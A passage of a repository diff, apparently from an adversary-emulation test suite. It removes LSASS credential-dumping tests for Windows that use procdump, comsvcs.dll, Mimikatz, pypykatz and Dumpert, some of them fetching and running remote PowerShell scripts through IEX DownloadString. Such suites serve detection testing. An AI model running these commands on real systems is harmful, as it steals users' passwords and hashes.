executor:
name: sh
command: |
zip #{output_file} #{input_files}
- name: Data Compressed - nix - gzip Single File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: Path that should be compressed
type: Path
default: /tmp/victim-gzip.txt
executor:
name: sh
command: |
gzip -f #{input_file}
- name: Data Compressed - nix - tar Folder or File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file_folder:
description: Path that should be compressed
type: Path
default: /tmp/victim-files/
output_file:
description: File that should be output
type: Path
default: /tmp/victim-files.tar.gz
executor:
name: sh
command: |
tar -cvzf #{output_file} #{input_file_folder}
atomics/T1003.001/T1003.001.md
-673
View File
@@ -1,673 +0,0 @@
# T1003.001 - LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Windows Credential Editor](#atomic-test-1---windows-credential-editor)
- [Atomic Test #2 - Dump LSASS.exe Memory using ProcDump](#atomic-test-2---dump-lsassexe-memory-using-procdump)
- [Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
<br/>
## Atomic Test #1 - Windows Credential Editor
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;wce.exe|
| wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{wce_exe} -o #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
```
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
$realTagUrl = $response.ResponseUri.OriginalString
$version = $realTagUrl.split('/')[-1]
$fileName = 'mimikatz_trunk.zip'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
| createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
```
#### Cleanup Commands:
```powershell
del #{output_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have createdump.exe from .Net 5
##### Check Prereq Commands:
```powershell
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
```
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands:
```powershell
Remove-Item ${output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
<br/>
atomics/T1003.001/T1003.001.yaml
-398
View File
@@ -1,398 +0,0 @@
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Windows Credential Editor
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: '%temp%\wce-output.txt'
wce_zip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
wce_exe:
description: Path of Windows Credential Editor executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\wce.exe
wce_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{wce_exe})
prereq_command: |
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
executor:
command: |
#{wce_exe} -o #{output_file}
cleanup_command: del "#{output_file}" >nul 2>&1
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
supported_platforms:
- windows
executor:
command: |
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
cleanup_command: |
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
supported_platforms:
- windows
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
- description: |
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
command: |
#{dumpert_exe}
cleanup_command: |
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the Lsass dump
type: Path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: string
default: PathToAtomicsFolder\T1003.001\bin\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
$realTagUrl = $response.ResponseUri.OriginalString
$version = $realTagUrl.split('/')[-1]
$fileName = 'mimikatz_trunk.zip'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
- description: |
Lsass dump must exist at specified location (#{input_file})
prereq_command: |
cmd /c "if not exist #{input_file} (exit /b 1)"
get_prereq_command: |
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
executor:
command: |
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live lsa
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
